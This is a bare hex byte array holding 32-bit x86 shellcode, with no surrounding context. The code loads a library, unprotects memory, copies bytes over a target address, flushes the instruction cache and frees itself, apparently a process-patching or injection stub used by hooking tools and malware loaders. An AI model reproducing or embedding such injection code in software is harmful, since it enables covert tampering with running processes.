0x58, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x04, 0x57, 0x8b, 0xf8, 0x8d, 0x87, 0xc0, 0x00, 0x00, 0x00, 
0x50, 0xff, 0x17, 0x85, 0xc0, 0x0f, 0x84, 0x87, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xfc, 0x50, 0x6a, 
0x04, 0xff, 0xb7, 0xb0, 0x00, 0x00, 0x00, 0xff, 0xb7, 0xa0, 0x00, 0x00, 0x00, 0xff, 0x57, 0x10, 
0x85, 0xc0, 0x74, 0x6e, 0x57, 0x56, 0x8b, 0x8f, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0xb7, 0x90, 0x00, 
0x00, 0x00, 0x8b, 0xbf, 0xa0, 0x00, 0x00, 0x00, 0xfc, 0xf3, 0xa4, 0x5e, 0x5f, 0x8d, 0x45, 0xfc, 
0x50, 0xff, 0x75, 0xfc, 0xff, 0xb7, 0xb0, 0x00, 0x00, 0x00, 0xff, 0xb7, 0xa0, 0x00, 0x00, 0x00, 
0xff, 0x57, 0x10, 0x85, 0xc0, 0x74, 0x3b, 0xff, 0xb7, 0xb0, 0x00, 0x00, 0x00, 0xff, 0xb7, 0xa0, 
0x00, 0x00, 0x00, 0x6a, 0xff, 0xff, 0x57, 0x20, 0xff, 0xb7, 0x80, 0x00, 0x00, 0x00, 0xff, 0x57, 
0x30, 0xff, 0xb7, 0x80, 0x00, 0x00, 0x00, 0xff, 0x57, 0x40, 0x8b, 0xc7, 0x5f, 0x83, 0xc4, 0x04, 
0x5d, 0x68, 0x00, 0x80, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xff, 0xb0, 0xa0, 0x00, 0x00, 0x00, 0xff, 
0x60, 0x50, 0xff, 0x57, 0x60, 0x50, 0xff, 0x57, 0x70, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc
